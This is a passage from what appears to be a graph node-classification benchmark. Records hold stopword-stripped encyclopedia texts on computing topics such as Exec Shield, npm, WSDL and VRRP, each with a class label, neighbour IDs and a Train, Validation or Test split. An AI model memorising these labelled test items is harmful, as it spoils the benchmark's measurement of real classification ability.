    "text": "Exec_Shield:exec shield exec shield project started red hat inc late 2002 aim reducing risk worm automated remote attacks linux systems first result project security patch linux kernel emulates nx bit x86 cpus lack native nx implementation hardware exec shield project many components people refer first patch exec shield first exec shield patch attempts flag data memory non-executable program memory non-writeable suppresses many security exploits stemming buffer overflows techniques relying overwriting data inserting code structures exec shield also supplies address space layout randomization mmap heap base patch additionally increases difficulty inserting executing shellcode rendering exploits ineffective application recompilation necessary fully utilize exec-shield although applications mono wine xemacs mplayer fully compatible features came exec shield project position independent executables pie address space randomization patch linux kernels wide set glibc internal security checks make heap format string exploits near impossible gcc fortify source feature port merge gcc stack-protector feature exec shield works x86 cpus utilizing code segment limit way exec shield works lightweight however wo n't fully protect arbitrary virtual memory layouts cs limit raised example calling mprotect make higher memory executable protections lost limit ingo molnar points e-mail conversation applications fairly sane stack important part least winds mapped libraries become executable except explicit calls application august 2004 nothing exec shield projects attempt enforce memory protections restricting mprotect architecture although memory may initially executable may become executable later kernel allow application mark memory pages writable executable time however cooperation security-enhanced linux project selinux standard policy fedora core distribution prohibit behavior executables exceptions compatibility reasons exec shield developed various people red hat first patch released ingo molnar red hat first released may 2003 part fedora core 1 6 red hat enterprise linux since version 3 people involved include jakub jelínek ulrich drepper richard henderson arjan van de ven",
    "neighbors": [
      4616,
      3082,
      3603,
      5139,
      10780,
      10785,
      6180,
      7717,
      8242,
      9266,
      5176,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      1632,
      6754,
      10851,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8867,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      9455,
      1776,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      11539,
      792,
      1820,
      10016,
      295,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      11188,
      1474,
      9667,
      457,
      5065,
      4562,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      499,
      2036,
      5620,
      8186,
      2044,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8067,
    "label": 5,
    "text": "WinExe:winexe winexe software allows administrator users execute commands remotely windowsnt/2000/xp/2003/vista/2003/2008 systems gnu/linux winexe distributed pre-built rpm packages source code available well winexe analogous sysinternals tool psexec",
    "neighbors": [
      5096,
      4074,
      6797,
      7983,
      5492,
      5397,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8068,
    "label": 2,
    "text": "Npm_(software):npm software npm originally short node package manager package manager javascript programming language default package manager javascript runtime environment node.js consists command line client also called npm online database public paid-for private packages called npm registry registry accessed via client available packages browsed searched via npm website package manager registry managed npm inc. npm written entirely javascript developed isaac z. schlueter result seen module packaging done terribly inspiration similar projects pear php cpan perl npm included recommended feature node.js installer npm consists command line client interacts remote registry allows users consume distribute javascript modules available registry packages registry commonjs format include metadata file json format 477,000 packages available main npm registry registry vetting process submission means packages found low quality insecure malicious instead npm relies user reports take packages violate policies low quality insecure malicious npm exposes statistics including number downloads number depending packages assist developers judging quality packages npm version 6 audit feature introduced help developers identify fix vulnerability security issues installed packages source security issues taken reports found node security platform nsp integrated npm since npm acquisition nsp npm manage packages local dependencies particular project well globally-installed javascript tools used dependency manager local project npm install one command dependencies project codice_8 file codice_8 file dependency specify range valid versions using semantic versioning scheme allowing developers auto-update packages time avoiding unwanted breaking changes npm also provides version-bumping tools developers tag packages particular version npm also provides codice_10 file entry exact version used project evaluating semantic versioning codice_8 number open-source alternatives npm installing modular javascript including codice_12 codice_13 codice_14 codice_15 last released facebook october 2016 compatible public npm registry use default provide different client-side experiences usually focused improving performance determinism compared npm client jsconf 2019 npm former cto announced new federated package registry entropic aimed decentralisation javascript commons",
    "neighbors": [
      1409,
      3971,
      3462,
      6791,
      8582,
      1802,
      6154,
      9487,
      788,
      1813,
      8213,
      10900,
      8476,
      8605,
      6176,
      1698,
      803,
      5155,
      4775,
      5031,
      6828,
      1203,
      438,
      4920,
      5819,
      1470,
      190,
      1087,
      5311,
      7871,
      8644,
      9671,
      5578,
      5067,
      3918,
      463,
      5070,
      339,
      3667,
      11221,
      4056,
      6361,
      2010,
      8923,
      9560,
      9561,
      2401,
      482,
      1379,
      8289,
      741,
      10854,
      231,
      6119,
      2281,
      9063,
      9195,
      5101,
      10991,
      10739,
      10744,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 8069,
    "label": 2,
    "text": "Convergent_Technologies_Operating_System:convergent technologies operating system convergent technologies operating system also known variously ctos btos starsys modular message-passing multiprocess-based operating system ctos many innovative features time system access controlled user password volume disk passwords one knew password example volume one could access file directory volume hard disk volume directory referenced delimiters identify could followed file name depending operation i.e network node volumename directoryname filename possible custom-link operating system add delete features ctos supported transparent peer-to-peer network carried serial rs-422 cables daisy-chain topology later versions carried twisted pair star topology rs-422 adapters workgroup called cluster connected server called master workstations normally diskless booted cluster network master could optionally locally booted attached hard drives inter-process communication ipc primarily based request respond messaging foundation enhanced enterprise application integration among services internal external environments thus ctos well known message-based microkernel architecture applications added services main server client consumes services via mailbox called exchange well-published message formats communication works request codes owned service operating system maintains exchanges message queues scheduling control message passing etc. service manages messages exchange using wait check respond macros ctos ran intel x86 computers could run concurrently windows nt unisys pc system api presented high-level languages assembly language assembler advanced lisp-like pattern-matching macro facility unmatched almost assembler since always-resident debugger system programs written pl/m algol-like language intel compiled directly object code without runtime library word processor one first screen-oriented editors many high-powered features multiple views file cut/copy/paste unlimited undo/redo typing lost crash power failure user-selectable fonts much spreadsheet allowed blocks cells protected editing user input btos version allowed scripts written included opening spreadsheet user input automatically printing graphs based input data system shell extensible making possible define new commands get parameters system would display form filled user input form conventions mandatory optional input fields made easy train new users convergent technologies first product iws integrated workstation based intel 8086 processor ctos operating system modular operating system built-in local area networking ctos supported multiple processes threads message-based interprocess communication companies licensed ctos included bull starsys burroughs btos later merged sperry become unisys unisys single largest customer convergent technologies merged become one company 1988 peak ctos 800,000 users worldwide diskless workstations e.g. bull used intel 80186 processor processor seldom used standard pcs progress software corporation made commercial database application ctos 4gl united states coast guard used databases logistics administration vessels port coreldraw ctos running presentation manager ctos longer marketed new customers former major customers included police forces banks airlines u.s postal service drug enforcement administration u.s. army united states coast guard coast guard used operating system approximately 1986 2000 australia ctos/btos used trade practices commission nsw auditor-general csiro commonwealth electoral office western australia prisons department many commercial banks",
    "neighbors": [
      512,
      6675,
      7187,
      10776,
      25,
      4637,
      5154,
      9762,
      5158,
      7217,
      9784,
      10809,
      576,
      8262,
      10333,
      97,
      8298,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150,
      2179,
      10883,
      6797,
      9366,
      6296,
      7325,
      9887,
      10926,
      3248,
      6837,
      8388,
      9932,
      5840,
      7382,
      8410,
      1253,
      5363,
      2811,
      10499,
      1804,
      8976,
      273,
      11539,
      10016,
      2345,
      7983,
      823,
      4409,
      7483,
      11075,
      4423,
      5457,
      11601,
      10590,
      8037,
      6502,
      8551,
      5492,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      5029,
      11184,
      6075,
      6078,
      9151,
      8136,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 8070,
    "label": 8,
    "text": "Web_Services_Description_Language:web services description language web services description language wsdl xml-based interface description language used describing functionality offered web service acronym also used specific wsdl description web service also referred wsdl file provides machine-readable description service called parameters expects data structures returns therefore purpose roughly similar type signature programming language current version wsdl wsdl 2.0 meaning acronym changed version 1.1 stood definition wsdl describes services collections network endpoints ports wsdl specification provides xml format documents purpose abstract definitions ports messages separated concrete use instance allowing reuse definitions port defined associating network address reusable binding collection ports defines service messages abstract descriptions data exchanged port types abstract collections supported operations concrete protocol data format specifications particular port type constitutes reusable binding operations messages bound concrete network protocol message format way wsdl describes public interface web service wsdl often used combination soap xml schema provide web services internet client program connecting web service read wsdl file determine operations available server special datatypes used embedded wsdl file form xml schema client use soap actually call one operations listed wsdl file using example xml http current version specification 2.0 version 1.1 endorsed w3c version 2.0 w3c recommendation wsdl 1.2 renamed wsdl 2.0 substantial differences wsdl 1.1 accepting binding http request methods get post version 1.1 wsdl 2.0 specification offers better support restful web services much simpler implement however support specification still poor software development kits web services often offer tools wsdl 1.1 example version 2.0 business process execution language bpel supports wsdl 1.1 subset wsdl swsdl wsdl subset operations original wsdl developer use swsdl access subset service thus handle subset web service code subset wsdl used perform web service testing top development slicing web service done using subset wsdl access subset service subset service categorized layers using swsdl swsdls used web service analysis testing top development awscm pioneer tool construct swsdl successfully xml version= 1.0 encoding= utf-8 description xmlns= http //www.w3.org/ns/wsdl documentation /documentation -- abstract type -- -- abstract interfaces -- -- concrete binding http -- -- concrete binding soap -- -- web service offering endpoints bindings -- /description wsdl 1.0 sept. 2000 developed ibm microsoft ariba describe web services soap toolkit built combining two service description languages nassl network application service specification language ibm sdl service description language microsoft wsdl 1.1 published march 2001 formalization wsdl 1.0 major changes introduced 1.0 1.1 wsdl 1.2 june 2003 working draft w3c become wsdl 2.0 according w3c wsdl 1.2 easier flexible developers previous version wsdl 1.2 attempts remove non-interoperable features also defines http 1.1 binding better wsdl 1.2 supported soap servers/vendors wsdl 2.0 became w3c recommendation june 2007 wsdl 1.2 renamed wsdl 2.0 substantial differences wsdl 1.1 changes following since wsdl files xml-based specification describing web service wsdl files susceptible attack mitigate vulnerability files limiting access generated wsdl files setting proper access restrictions wsdl definitions avoiding unnecessary definitions web services encouraged",
    "neighbors": [
      11650,
      7943,
      8203,
      6284,
      1041,
      5907,
      10396,
      158,
      7455,
      4768,
      545,
      10910,
      10020,
      6775,
      7592,
      10791,
      5048,
      1851,
      4795,
      4797,
      6334,
      8766,
      322,
      4419,
      2501,
      5830,
      7878,
      9415,
      1481,
      1354,
      5449,
      10829,
      4688,
      3921,
      6353,
      11353,
      8923,
      1756,
      7261,
      479,
      4960,
      9441,
      1250,
      10465,
      11105,
      6629,
      1128,
      489,
      8425,
      4974,
      7408,
      10611,
      4213,
      502,
      6007,
      2296,
      10486,
      3323,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 8071,
    "label": 7,
    "text": "Scaleform_GFx:scaleform gfx scaleform gfx game development middleware package vector graphics rendering engine used display adobe flash-based user interfaces huds video games result autodesk acquisition scaleform corporation march 2011 scaleform gfx became part autodesk gameware line middleware july 12th 2018 autodesk discontinued scaleform gfx longer available purchase authors created user interfaces using adobe flash authoring tools adobe flash professional resulting swf files could used directly gfx libraries providing similar functionality adobe flash player optimized use within game engines major platforms supported including game consoles mobile pc operating systems scaleform provided apis direct communication flash content game engine pre-built integrations popular engines unity unreal engine cryengine scaleform gfx could also licensed use standalone flash runtime system mobile platforms competing adobe air scaleform gfx contained several core systems including addition engine documentation samples scaleform gfx sdk included several additional components scaleform also provided two optional add-ons gfx",
    "neighbors": [
      2304,
      4292,
      8937,
      4378,
      9579,
      6797,
      10316,
      10097,
      2804,
      2293,
      3413,
      823,
      8185,
      3130,
      9691,
      10076,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 8072,
    "label": 3,
    "text": "Intel_8251:intel 8251 8251 universal synchronous/asynchronous receiver/transmitter packaged 28-pin dip made intel typically used serial communication rated per second signalling rate commonly confused much common 8250 uart made popular serial port ibm personal computer includes 5 sections version 8251a available us 6.40 quantity 100 intel 8251a used intel sdk-86 mcs-86 system design kit dec la120 printing terminal",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 8073,
    "label": 5,
    "text": "Virtual_Router_Redundancy_Protocol:virtual router redundancy protocol virtual router redundancy protocol vrrp computer networking protocol provides automatic assignment available internet protocol ip routers participating hosts increases availability reliability routing paths via automatic default gateway selections ip subnetwork protocol achieves creation virtual routers abstract representation multiple routers i.e master backup routers acting group default gateway participating host assigned virtual router instead physical router physical router routing packets behalf virtual router fails another physical router selected automatically replace physical router forwarding packets given time called master router vrrp provides information state router routes processed exchanged router vrrp instance limited scope single subnet advertise ip routes beyond subnet affect routing table way vrrp used ethernet mpls token ring networks internet protocol version 4 ipv4 well ipv6 protocol described internet engineering task force ietf publication rfc 5798 open standard cisco claims similar protocol essentially facility patented licensed however reply direct request robert barr cisco replied 2001 assert patent claims unless someone tried assert claim cisco ibm also claims covering patents statement readable ietf webpage virtual router must use 00-00-5e-00-01-xx media access control mac address last byte address xx virtual router identifier vrid different virtual router network address used one physical router time reply mac address arp request sent virtual router ip address physical routers within virtual router must communicate within using packets multicast ip address 224.0.0.18 ip protocol number 112 routers priority 1 254 router highest priority become master default priority 100 mac address owner priority always 255 failure receive multicast packet master router period longer three times advertisement timer causes backup routers assume master router dead virtual router transitions unsteady state election process initiated select next master router backup routers fulfilled use multicast packets backup router supposed send multicast packets election process one exception rule physical router configured higher priority current master means connection network preempt master status allows system administrator force physical router master state immediately booting example particular router powerful others within virtual router backup router highest priority becomes master router raising priority current master take responsibility routing packets sent virtual gateway mac address cases backup routers priority backup router highest ip address becomes master router physical routers acting virtual router must local area network lan segment communication within virtual router takes place periodically period adjusted changing advertisement interval timers shorter advertisement interval shorter black hole period though expense traffic network security achieved responding first hop packets though mechanisms provided reinforce particularly local attacks election process made orderly use skew time derived router priority used reduce chance thundering herd problem occurring election skew time given formula 256 − priority /256 expressed milliseconds backup router utilization improved load sharing see rfc 5798 vrrp based cisco proprietary hot standby router protocol hsrp concepts protocols similar concept compatible",
    "neighbors": [
      5472,
      3042,
      11461,
      6214,
      841,
      2954,
      5486,
      3323,
      6834,
      7411,
      7702,
      2811,
      5469,
      5470
    ],
    "mask": "Train"
  },
  {
    "node_id": 8074,
    "label": 4,
    "text": "Blancco_Technology_Group_plc:blancco technology group plc blancco technology group global provider mobile device diagnostics secure data erasure products company divided two distinct business units blancco data erasure smartchk mobile diagnostics data erasure solution providers blancco technology group holds highest number certifications approvals recommendations national international governing bodies including united states department defense nato tuv saarland dipcog originally known regenersis plc lse rgs blancco technology group plc lse bltg formed 2016 result number software business acquisitions following acquisitions regenersis disposed repair division focus pure-play software business renamed blancco technology group plc company divided two distinct business units blancco data erasure smartchk mobile diagnostics blancco technology group employs 240 people worldwide across north america europe asia australia company headquartered alpharetta ga united states certified data erasure software hardware see blancco mobile device diagnostics software business intelligence see smartchk blancco technology group started regenersis plc provider diagnostics repair data erasure services consumer electronics industry regenersis filed ipo 2005 public company london stock exchange year acquired intec group intec cellular services intec distribution blancco technology group partners multiple resellers distributors including asset disposition vendors mobile services recycling providers data centers cloud storage providers",
    "neighbors": [
      11368,
      9086
    ],
    "mask": "Test"
  },
  {
    "node_id": 8075,
    "label": 6,
    "text": "High_Sierra_Format:high sierra format high sierra format hsf early logical file system used cd-roms 1985 1986 later ecma-119 iso 9660 standards based revised hsf compact discs originally developed recording musical data soon used storing additional digital data types equally effective archival mass data storage first every cd-rom maker created format high-level standards yellow book cd-rom standard lowest level need standard organizing data compact disks logical units files order develop cd-rom file system standard z39.60 volume file structure cdrom information interchange national information standards organization niso set standards committee sc ee compact disc data format july 1985 september/ october 1985 several companies invited experts participate development working paper standard november 1985 representatives computer hardware manufacturers gathered high sierra hotel casino currently called hard rock hotel casino near lake tahoe california group became known high sierra group hsg present meeting representatives apple computer digital equipment corporation dec hitachi laserdata microware microsoft 3m philips reference technology inc. sony corporation tms inc. videotools later meridian xebec yelick meeting report evolved yellow book cd-rom standard data cds open ended leading diversification creation many incompatible data storage methods high sierra group proposal hsgp released may 1986 draft version submitted european computer manufacturers association ecma changes led issue initial edition ecma-119 standard december 1986 ecma submitted standard international standards organization iso fast tracking refined iso 9660 compatibility second edition ecma-119 revised equivalent iso 9660 december 1987. published 1988 ecma-119 iso 9660 needed hsf geared primarily towards needs us market international extensions bulk differences formats order create incompatibilities niso suspended work z39.60 adopted niso members 28 may 1987 withdrawn final approval favour iso 9660",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      7720,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      8301,
      5231,
      9329,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7342,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8110,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      4548,
      5062,
      7126,
      5596,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 8076,
    "label": 2,
    "text": "Fedora_Media_Writer:fedora media writer fedora media writer formerly fedora live usb creator free open-source tool designed create live usb operating systems",
    "neighbors": [
      934,
      6797,
      7983,
      11221,
      823,
      6012,
      4637
    ],
    "mask": "None"
  },
  {
    "node_id": 8077,
    "label": 2,
    "text": "OpenSolaris_for_System_z:opensolaris system z opensolaris system z discontinued port opensolaris operating system ibm system z line mainframe computers opensolaris based solaris originally released sun 1991 sun microsystems released bulk solaris system source code opensolaris 14 june 2005 made possible developers create opensolaris distributions sine nomine associates began project bring opensolaris ibm mainframe july 2006 project named sirius analogy polaris project port opensolaris powerpc april 2007 sine nomine presented initial progress report ibm system z technical expo conference gartner data center conference las vegas nevada late 2007 sine nomine demonstrated opensolaris running ibm system z z/vm david boyes sine nomine stated opensolaris system z would available soon share conference 13 august 2008 neale ferguson sine nomine associates presented update progress opensolaris system z presentation included working demonstration opensolaris system z presentation stated opensolaris ready prime-time hoped version available public testing matter weeks rather months october 2008 sine nomine associates released first prototype lacks number features dtrace solaris containers ability act nfs server opensolaris system z public opensolaris system z project page opensolaris.org opensolaris system z available download charge governed open source license terms opensolaris platforms source code available oco object code modules port uses z/architecture 64-bit addressing therefore requires ibm system z mainframe port depends recently defined z/architecture processor instructions requires system z9 later mainframe model run older machines also run release version hercules mainframe emulator needed changes included svn version 5470 hercules also requires paravirtualization features provided z/vm run bare metal logical partition lpar without z/vm hypervisor version 5.3 level later also opensolaris uses new network diagnose instruction ptf vm64466 vm64471 must applied z/vm provide support instruction 18 november 2008 ibm authorized use ifl processors run opensolaris system z workloads register reported march 2010 email insider saying",
    "neighbors": [
      10883,
      4996,
      7053,
      9361,
      9468,
      789,
      2967,
      11673,
      9370,
      3359,
      5280,
      6049,
      9343,
      421,
      7848,
      1323,
      6445,
      8879,
      7217,
      10803,
      7733,
      7607,
      10040,
      5562,
      573,
      9665,
      1219,
      8388,
      6342,
      1235,
      5335,
      863,
      11363,
      868,
      3429,
      9829,
      6248,
      366,
      381,
      5240,
      11506,
      2168,
      4858,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "None"
  },
  {
    "node_id": 8078,
    "label": 3,
    "text": "Program_status_word:program status word program status word psw ibm system/360 architecture successors control register performs function status register program counter architectures although certain fields within psw may tested set using non-privileged instructions testing setting remaining fields may accomplished using privileged instructions contained within psw two bit condition code representing zero positive negative overflow similar flags architectures status registers conditional branch instructions test encoded four bit value bit representing test one four condition code values 2 2 2 2 since ibm uses big-endian bit numbering mask value 8 selects code 0 mask value 4 selects code 1 mask value 2 selects code 2 mask value 1 selects code 3 64-bit psw describes among things early instances architecture system/360 early system/370 instruction address 24 bits later instances xa/370 instruction address 31 bits plus mode bit 24 bit addressing mode zero 31 bit addressing mode one total 32 bits present instances architecture z/architecture instruction address 64 bits psw 128 bits psw may loaded load psw instruction lpsw lpswe contents may examined extract psw instruction epsw",
    "neighbors": [
      7607,
      9911,
      9739,
      10508,
      10796,
      3630,
      5457,
      5234,
      663,
      2745,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 8079,
    "label": 9,
    "text": "Scilab:scilab scilab free open-source cross-platform numerical computational package high-level numerically oriented programming language used signal processing statistical analysis image enhancement fluid dynamics simulations numerical optimization modeling simulation explicit implicit dynamical systems corresponding toolbox installed symbolic manipulations scilab one two major open-source alternatives matlab one gnu octave scilab puts less emphasis syntactic compatibility matlab octave similar enough authors suggest easy transfer skills two systems scilab high-level numerically oriented programming language language provides interpreted programming environment matrices main data type using matrix-based computation dynamic typing automatic memory management many numerical problems may expressed reduced number code lines compared similar solutions using traditional languages fortran c c++ allows users rapidly construct models range mathematical problems language provides simple matrix operations multiplication scilab package also provides library high-level operations correlation complex multidimensional arithmetic software used signal processing statistical analysis image enhancement fluid dynamics simulations numerical optimization scilab also includes free package called xcos fork scicos based modelica language modeling simulation explicit implicit dynamical systems including continuous discrete sub-systems xcos open source equivalent simulink mathworks syntax scilab similar matlab scilab includes source code translator assisting conversion code matlab scilab scilab available free cost open source license due open source nature software user contributions integrated main program scilab syntax largely based matlab language simplest way execute scilab code type prompt codice_1 graphical command window way scilab used interactive mathematical shell hello world scilab plotting 3d surface function v scilab many contributed toolboxes different tasks available atoms portal scilab forge scilab created 1990 researchers inria école nationale des ponts et chaussées enpc initially named ψlab psilab scilab consortium formed may 2003 broaden contributions promote scilab worldwide reference software academia industry july 2008 order improve technology transfer scilab consortium joined digiteo foundation scilab 5.1 first release compiled mac available early 2009 supported mac os x 10.5 a.k.a leopard thus osx 10.4 tiger never supported except porting sources linux windows builds released since beginning solaris support dropped version 3.1.1 hp-ux dropped version 4.1.2 spotty support june 2010 consortium announced creation scilab enterprises scilab enterprises develops markets directly international network affiliated services providers comprehensive set services scilab users scilab enterprises also develops maintains scilab software ultimate goal scilab enterprises help make use scilab effective easy february 2017 scilab 6.0.0 released leveraged latest c++ standards lifted memory allocation limitations since july 2012 scilab developed published scilab enterprises early 2017 scilab enterprises acquired virtual prototyping pioneer esi group since 2016 scilab embedded browser called via interface written scilab api new deployment method notable advantages masking code data well providing large computational power",
    "neighbors": [
      2304,
      7301,
      5129,
      3980,
      6797,
      15,
      5395,
      5148,
      7580,
      7326,
      5023,
      9376,
      10145,
      5677,
      1917,
      7341,
      7983,
      2481,
      6450,
      6962,
      9133,
      823,
      6718,
      2242,
      5830,
      5703,
      8262,
      5833,
      4042,
      11207,
      462,
      8162,
      11239,
      4840,
      363,
      7148,
      5741,
      9330,
      3960,
      11385,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8080,
    "label": 2,
    "text": "Features_new_to_Windows_XP:features new windows xp windows xp introduced many features found previous versions windows introduction windows xp c++ based software-only gdi+ subsystem introduced replace certain gdi functions gdi+ adds anti-aliased 2d graphics textures floating point coordinates gradient shading complex path management bicubic filtering intrinsic support modern graphics-file formats like jpeg png support composition affine transformations 2d view pipeline gdi+ uses argb values represent color use features apparent windows xp user interface transparent desktop icon labels drop shadows icon labels desktop shadows menus translucent blue selection rectangle windows explorer sliding task panes taskbar buttons several applications microsoft paint windows picture fax viewer photo printing wizard pictures slideshow screensaver presence basic graphics layer greatly simplifies implementations vector-graphics systems flash svg gdi+ dynamic library shipped application used older versions windows total number gdi handles per session also raised windows xp 16384 65536 configurable registry windows xp shipped directx 8.1 brings major new features directx graphics besides directx audio directsound directmusic directplay directinput directshow direct3d introduced programmability form vertex pixel shaders enabling developers write code without worrying superfluous hardware state fog bump mapping texture mapping directx 9 released 2003 also sees major revisions direct3d directsound directmusic directshow direct3d 9 added new version high level shader language support floating-point texture formats multiple render targets texture lookups vertex shader windows xp upgraded directx 9.0c shader model 3.0 later included windows xp sp2 windows xp sp3 added windows imaging component windows xp includes cleartype subpixel rendering makes onscreen fonts smoother readable liquid crystal display lcd screens although cleartype effect crt monitors primary use lcd/tft-based laptop notebook modern 'flatscreen displays cleartype windows xp currently supports rgb bgr sub pixel structures parameters contrast set via cleartype tuner powertoy microsoft makes available free download typography website windows xp start button updated support fitts law help user access wider range common destinations easily single location start menu expanded two columns left column focuses user installed applications right column provides access user documents system links previously located desktop links documents pictures special folders brought fore computer network places network neighborhood windows 95 98 icons also moved desktop start menu making easier access icons number applications open desktop remains clean moreover links configured expand cascading menu frequently used programs automatically displayed left column newly installed programs highlighted user may opt pin programs start menu always accessible without navigate programs folders default internet browser default email program pinned start menu start menu fully customizable links added removed number frequently used programs display set programs menu expands like classic start menu utilize entire screen set scroll programs user name user account picture also shown start menu taskbar buttons running applications quick launch also updated fitt law locking taskbar prevents accidentally resized moved elements quick launch deskbands also locked accidentally moved taskbar grouping feature combines multiple buttons application single button clicked pops menu listing grouped windows number advanced taskbar grouping options configured registry user choose always show always hide hide notification area icons inactive time button allows user reveal icons taskbar set thicker height also displays day date notification area significant changes made windows explorer windows xp visually functionally microsoft focused especially making windows explorer discoverable task-based well adding number features reflect growing use computer “ digital hub ” task pane displayed left side window instead traditional folder tree view navigation pane turned presents user list common actions destinations relevant current directory file selected instance directory containing mostly pictures set “ picture tasks ” shown offering options display pictures slide show print go online order prints conversely folder containing music files would offer options play files media player go online purchase music every folder also “ file folder tasks ” offering options create new folders share folder local network publish files folders web site using web publishing wizard common tasks like copying renaming moving deleting files folders file types identified printable also option listed print file underneath “ file folder tasks ” “ places ” always lists parent folder folder viewed includes additional links common locations “ computer ” “ control panel ” “ documents ” previously navigated locations change depending folder user underneath “ places ” “ details ” area gives additional information file folder selected – typically file type file size date modified depending file type author image dimensions attributes details file type thumbnail image handler installed preview also appears details task pane music files might show artist album title length song information also shown horizontally status bar “ folders ” button windows explorer toolbar toggles traditional navigation pane containing tree view folders task pane users also close navigation pane clicking close button right corner well turn task pane folder options navigation pane enhanced windows xp support simple folder view turned hides dotted lines connect folders subfolders makes folders browsable single click still keeping double clicking right pane single clicking simple folder view auto expands folder clicking another folder automatically expands folder collapses previous one windows xp introduced large number metadata properties shown columns details view explorer new tiles view explorer summary tab file properties file tooltip explorer status bar single file selected users also gain ability sort property turned details view developers write column handler shell extensions define properties files sorted column items sorted highlighted sorting files folders ascending order descending order views details view reverse order user simply perform sort property sort order also made intuitive compared one windows 2000 file names containing numbers windows explorer tries sort based numerical value rather comparing number digit digit every character position file name instance files containing 1 2 .. 10 intuitively sorted 10 appearing 9 instead appearing 1 2 right pane windows explorer show groups feature allows explorer separate contents headings based field used sort items items thus grouped detail turned show groups available thumbnails tiles icons details views microsoft introduced animated search companions attempt make searching engaging friendly default character puppy named rover three characters merlin magician earl surfer courtney also available search companions powered microsoft agent technology bear great deal similarity microsoft office ’ office assistants even incorporating “ tricks ” sound effects user wishes also turn animated character entirely search capability fairly similar windows windows 2000 important additions indexing service extract exif properties well metadata asf wmv mp3 files windows xp via ipropertystorage interface using built-in null filter search also instructed search files categorically “ documents ” “ pictures music video searching perceived type feature noteworthy largely windows determines types files classified categories another important addition look field accepts expands environment variables abbreviated entry long paths also users configure whether windows xp searches system and/or hidden files folders using tweak ui search user interface restored one used windows 2000 windows xp improves image preview offering filmstrip view shows images single horizontal row large preview currently selected image “ back ” “ previous ” buttons facilitate navigation pictures pair “ rotate ” buttons offer 90-degree clockwise counter-clockwise rotation images filmstrip view like view turned per folder view available new common tasks folder view selected windows classic folder view aside filmstrip view mode 'thumbnails view displays thumbnail-sized images folder also displays images subfolder may containing 4 default overlaid large folder icon folder thumbnail view customized customize tab accessible properties users also change folder icon specify template type pictures music videos documents folder optionally subfolders size quality thumbnails thumbnails view adjusted using tweak ui registry exif metadata stored image also shown file properties summary tab details view view status bar windows xp optionally caches thumbnails thumbs.db file folder pictures thumbnails generated faster next time thumbnails forced regenerate right-clicking image thumbnail filmstrip views selecting refresh thumbnail autoplay examines newly discovered removable media devices based content pictures music video files launches appropriate application play display content autoplay confused autorun created order simplify use peripheral devices – mp3 players memory cards usb storage devices others – automatically starting software needed access view content devices autoplay enhanced autoplay-compatible software hardware configured user associate favourite applications autoplay events actions actions called autoplay handlers sets handlers associated various types content new autoplay handlers get added system additional software installed user edit delete create autoplay handlers using tweakui autoplay settings configured per-device windows xp device properties user inserts optical disc drive attaches usb camera windows detects arrival starts process examining device searching medium looking properties device content medium autoplay present set meaningful options user user makes particular choice also option make selection automatic next time windows sees content device content types available vary type drive selected windows xp includes windows picture fax viewer based gdi+ capable viewing image formats supported gdi+ namely jpeg bmp png gif including animated gifs ico wmf emf tiff format files supersedes part functions imaging windows previous versions windows windows picture fax viewer integrated windows explorer functions like slideshow email printing etc quickly starts image double clicked windows explorer supports full file management within viewer right clicking image shows context menu one shown image right clicked windows explorer images set desktop wallpaper context menu supports successive viewing images current folder looping images viewing last image directory shows first image vice versa default images smaller user display resolution shown actual size image larger display resolution scaled fit screen best fit images zoomed depending viewing area done scroll bars allow viewing areas image standard toolbar buttons delete print copy open copy button converts image different format supported gdi+ jpeg bmp gif tiff png print button starts photo printing wizard allows printing images picture titles using various page layouts full page prints wallet prints contact/index sheets certain fixed dimensions images cropped rotated fit page wizard shows preview printed page look like currently specified options windows picture fax viewer also rotate images clockwise anti-clockwise start slideshow selected images folder e-mail selecting send mail recipient option options allow image mailed full size pixel dimensions 640 x 480 800 x 600 1024 x 768 using tweak ui time images slideshow adjusted windows picture fax viewer 